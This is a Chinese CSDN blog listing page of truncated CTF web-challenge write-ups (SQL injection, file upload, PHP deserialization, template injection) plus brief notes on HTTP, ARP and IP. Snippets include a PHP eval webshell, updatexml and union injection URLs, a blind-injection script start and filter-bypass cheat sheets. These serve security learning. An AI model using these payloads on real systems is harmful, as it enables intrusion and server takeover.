d0ud-优快云博客

原创 [安洵杯 2019]easy_serialize_php

打开题目，得到源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESSI

2021-11-15 22:30:25 117

原创 [BJDCTF2020]Cookie is so stable

打开题目，看着像注入，测试发现确实存在模板注入但回显的数据是根据客户端发送的cookie确定的。提交表单后，服务端给客户端重定向并根据表单信息设置cookie，客户端被重定向时会发送刚刚得到的cookie，服务端根据cookie回显数据。但其实这题的重定向只是再次访问了flag.php。具体请自行F12查看。测试发现是Twig模板，根据网上大量的Twig模板注入payload即可得到flag...

2021-11-12 16:31:45 1458

原创 [BSidesCF 2020]Had a bad day

打开题目，发现可疑网址index.php?category=woofers测试参数时发现可能存在后缀为php的文件包含index.php?category=woofers%20aWarning: include(woofers a.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37Warning: include(): Failed opening ‘woo

2021-11-11 21:19:46 765

原创 [网鼎杯 2020 朱雀组]phpweb

打开题目Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, yo

2021-11-05 15:50:16 151

原创 [安洵杯 2019]easy_web

打开题目，网址为index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=这两个参数似乎可以利用对img参数进行测试，发现加载的图片好像是由img决定的对TXpVek5UTTFNbVUzTURabE5qYz0base64解码得到MzUzNTM1MmU3MDZlNjc=，再次解码得到3535352e706e67，再hex解码得到555.png那可以直接得到index.php的源码，那岂不是也可以直接拿到flagindex.php?img=Tm

2021-11-03 16:53:30 260

原创 [GWCTF 2019]我有一个数据库

打开题目鎴戞湁涓€涓暟鎹簱锛屼絾閲岄潰浠€涔堜篃娌℃湁~涓嶄俊浣犳壘直接查看没什么提示，那就先扫一遍目录有 robots.txt 和 phpmyadminrobots.txtUser-agent: *Disallow: phpinfo.php访问，得到 phpinfo() 界面phpmyadmin 直接进入后台管理，但没有得到任何数据，看看这个版本的phpmyadmin有什么可以利用的漏洞搜索出来一大堆，直接借着现成的payload就行了...

2021-11-01 12:15:33 369

原创 [SUCTF 2019]EasySQL

打开题目，简单测试，可以发现是数字型注入对于提交的数据，字符不回显，除零回显不同外，任何数字都有相同回显，union被过滤，但在尝试堆叠注入时成功。query=1;show tables;Array ( [0] => 1 ) Array ( [0] => Flag )在后续测试中发现，如果在提交的数字后加入分号，则回显的数据为提交的数字，猜测查询语句的前半段为select $_POST['query'] ...验证query=13;select 4Array ( [0

2021-10-30 16:30:55 158

原创 [CISCN2019 华北赛区 Day2 Web1]Hack World

打开题目，简单测试发现是数字型注入且大部分关键字都被过滤，尝试布尔盲注。id=0^((substr((select(flag)from(flag)),1,1))='f')回显id=1时的界面说明注入成功，用脚本即可跑出flagimport requestsurl = "http://88cefe6c-611d-488c-89c1-a6ae8a08a682.node4.buuoj.cn:81/index.php"dat = { "id" : ""}for i in range(1,60):

2021-10-28 17:25:25 178

原创 SQL注入

堆叠注入union注入报错注入 updatexml() , extractvalue()截断字符串substr()mid()substring()left()right()常用函数database()version()user()concat()group_concat()绕过（）代替空格双写大小写内联注释...

2021-10-27 19:19:33 168

原创 [极客大挑战 2019]HardSQL

打开题目，SQL注入，看来是有严格限制，但好在没过滤引号输入部分SQL关键字测试发现过滤了的关键字有union（空格）=/*union注入和堆叠注入均为失败，但会回显报错信息，可以尝试报错注入这里使用updatexml()库名check.php?username=admin&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23XPATH syntax error: ‘~geek~’表名check

2021-10-27 17:11:24 110

原创 [网鼎杯 2020 青龙组]AreUSerialz

打开题目，获得一大段代码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $c

2021-10-26 20:49:13 106

原创 [网鼎杯 2018]Fakebook

打开题目，先看看有什么功能，发现查看用户时，网址为view.php?no=1尝试view.php?no=0得到报错界面。尝试用"order by"测试，发现存在SQL注入，且得出字段数为4开始尝试查询view.php?no=0%20union%20select%201,2,3,4回显no hack _用内联注释绕过view.php?no=1%20/*!%20union*/%20select%201,2,3,4%20limit%201,1然而出现了奇怪的报错回显第二个

2021-10-25 21:43:31 238

原创 [MRCTF2020]Ez_bypass

打开题目I put something in F12 for you include 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got

2021-10-25 19:02:09 132

原创 php伪协议

file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流（I/O streams）zlib:// — 压缩流data:// — 数据（RFC 2397）glob:// — 查找匹配的文件路径模式phar:// — PHP 归档ssh2:// — Secure Shell 2rar:// — RARogg:// — 音频流expect:// — 处理交互式的流常用dat.

2021-10-24 15:23:10 69

原创 [ZJCTF 2019]NiZhuanSiWei

打开题目<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br

2021-10-24 15:00:54 114

原创 php中可以代替执行linux命令的函数

执行代码eval()assert()执行命令system()exec()shell_exec()文件操作查看 scandir()读取 get_file_contents()

2021-10-23 17:34:40 389

原创 shell上传

前端文件后缀限制抓包修改后端文件后缀限制上传.user.ini文件利用apache解析漏洞，加上无法解析的后缀，如上传shell.php.abc文件头检查加上图片文件头，如GIF8a文件内容检查<script language=‘php’> 代替 <?php...

2021-10-23 17:12:34 359

原创 [SUCTF 2019]CheckIn

打开题目，常规的文件上传经过各种上传测试，似乎在后端有文件后缀检测且难以绕过但可以上传.user.ini文件，且上传文件成功后会主动给出路径，而这个路径下恰好有一个php文件上传木马GIF8a<script language='php'>@eval($_POST['door']);</script>得到木马路径Your dir uploads/0e2baa5f405a4e8f1b40ce791fae880aYour files :array(4) { [0]=&

2021-10-23 17:02:14 194

原创 [护网杯 2018]easy_tornado

打开题目，获得三个txt文件/flag.txt/welcome.txt/hints.txt逐个查看/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))注意网址file?filename=/hints.txt&filehash=a5e3bf0b05c444070549eeced63bdeab那么我们应该是要访问file?f

2021-10-22 19:11:08 112

原创 [极客大挑战 2019]BabySQL

打开题目，输入测试语句admin'123回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘123’’ at line 1那么我们有理由怀疑查询username和password的SQL语句是同一句admin';123You have an error in

2021-10-20 20:32:51 127

原创 php中字符串与数值的比较

我们知道PHP是一门弱类型语言，当涉及“==”判断时，它的表现是有一些奇特的。例如，“a==0”将会得到true，“a==1”将会得到false。原理：PHP语言中在涉及“==”判断时，如果运算符两边分别为字符串（不以数字开头的字符串），会将字符串转化为数字0，再进行比较。如果是以数字开头的字符串，那么它将会转化成开头的数字（即第一个字母前的所有数字）。(int)"787abe"=787 (int)"abc"=0 (int)"1a2b"=1 (int)"a12b"=0 (

2021-10-19 20:18:23 805

原创 [HCTF 2018]WarmUp

打开题目，无线索，查看源码，提示source.php访问，得到源码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isse

2021-10-19 20:12:49 71

原创 PHP序列化

PHP序列化函数和反序列化函数为serialize(),unserialize()序列化字符串格式为布尔值（bool） b:value 整数型（int） i:value 字符串型（str） s:length:"value" 数组型（array） a:length:{...} 对象型（object） O:length:class_name:properties_number{...} NULL型__wakeup()绕过CVE-2016-7124.

2021-10-18 20:28:36 345

原创 [极客大挑战 2019]PHP

打开题目，提示备份网站，直接扫描目录，得到www.zip解压得到class.php,index.php,flag.php等源码index.php中关键代码为 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>class.php为<?phpinclude 'flag.php';error_reporting(0);

2021-10-18 12:42:36 697

原创 [RoarCTF 2019]Easy Calc

打开题目，查看源码,发现关键代码<script> $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:functio

2021-10-17 16:50:12 106

原创 [极客大挑战 2019]LoveSQL

显然是一道SQL注入题在用户名和密码处输入引号测试，可以发现是单引号闭合。输入以下进行测试q';test123回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘test’ and password=‘123’’ at line 1此时很容易想到输入a1' or

2021-10-16 22:29:09 132

原创 [强网杯 2019]随便注

参考[GYCTF2020]Blacklist不同点在于，这道题目的表名为纯数字字符串，需要用反单引号括起来。

2021-10-15 15:44:32 80

原创 [ACTF2020 新生赛]Upload

打开题目，文件上传选择后缀为php的shell上传，弹出警告该文件不允许上传，请上传jpg、png、gif结尾的图片噢！将文件后缀改为jpg，上传成功Upload Success! Look here~ ./uplo4d/394659692a460258b45a99f1424ea357.jpg再次上传，并抓包将后缀改为phtmlUpload Success! Look here~ ./uplo4d/71056c0c9cb12f2b7d720156da9eabf1.phtml上传成功

2021-10-15 15:13:53 265

原创 [极客大挑战 2019]Upload

打开题目，为文件上传尝试上传后缀为php的木马<?php @eval($_GET['door']); ?>结果Not image!将后缀改为jpg，结果NO! HACKER! your file included ‘<?’将木马改为<script language='php'>@eval($_GET['door']);</script>再次上传，结果Don’t lie to me, it’s not image at all!!!

2021-10-14 22:15:58 220

原创 [GYCTF2020]Blacklist

打开题目网址，是一个表单。输入引号测试，输入单引号时，出现如下报错error 1064 : You have an error in your SQL syntax; check themanual that corresponds to your MariaDB server version for theright syntax to use near ‘1’’’ at line 1继续输入SQL语句测试，出现如下returnpreg_match("/set|prepare|alte

2021-10-14 19:55:06 114

原创 HTTP协议

http：超文本传输协议，属于应用层协议通过浏览器，我们可以很方便地用http协议与其他主机通信。当然我们也可以使用curl，但浏览器会帮我们解析HTML，而curl不会。（curl是什么？打开命令行，输入“man curl ”）HTTP请求与HTTP响应对于使用http协议通信的应用，在数据包的应用数据段具有统一的格式。第一行为请求行（响应行），第二行起至空白行前为请求头（响应头），空白行后为请求正文（响应正文）。如下为一个HTTP请求POST /example.php HTTP/1.1Ho

2021-06-06 18:49:50 187 1

原创 arp协议

处于同一子网下的两台主机需要通信时，不仅需要对方的IP地址，还需要对方的MAC地址。arp协议可用于网络层地址（IP地址）和链路层地址（MAC地址）间的映射。假设有A主机192.168.31.2需要和B主机192.168.31.3通信，A已经知道B的IP地址了，接下来需要获取B的MAC地址，这个时候A查询arp表，如果没有对应主机B的表项，就会广播一个arp分组请求B的MAC地址，子网里除B外其他主机都不响应A，B则会将自己的MAC地址发送给A，那么A就能向B发送数据了。arp表打开命令行，输入"

2021-05-29 12:57:13 447

原创 IP数据报首部

一般IP数据报首部为20byte，即160bit（“一般”指不带选项的首部）依顺序各个位置含义如下：• 4bit：协议版本号，目前广泛使用的为IPv4• 4bit：首部长度除以32（单位为bit），如160bit是32bit的5倍，则为5• 8bit：服务类型（TOS），通过特定的数值来表明需要何种服务，控制最小时延、最大吞吐量等，• 16bit：数据报总长度，16bit意味着最大长度可以达到65535bit，注意这里指的是IP数据报，并不包括以太网首部或以太网尾部的长度• 16bit：用于标识

2021-05-22 22:04:43 3451

原创 IP地址

根据IP地址第一个十进制数可以判断该IP地址类别0-127 A类地址128-191 B类地址192-223 C类地址224-239 D类地址240-247 E类地址既然可以根据此判断网络号和主机号，那么子网掩码有什么用呢答：子网掩码可以用来区分子网号例如一个IP地址：172.31.64.1 ，子网掩码：255.255.240.0我们可以很容易发现这是一个B类地址，这意味着网络号是172.31把剩下的十进制数转换为二进制，240.0 为1111 0000 0000 000064.1为

2021-05-22 22:00:07 363

d0ud的博客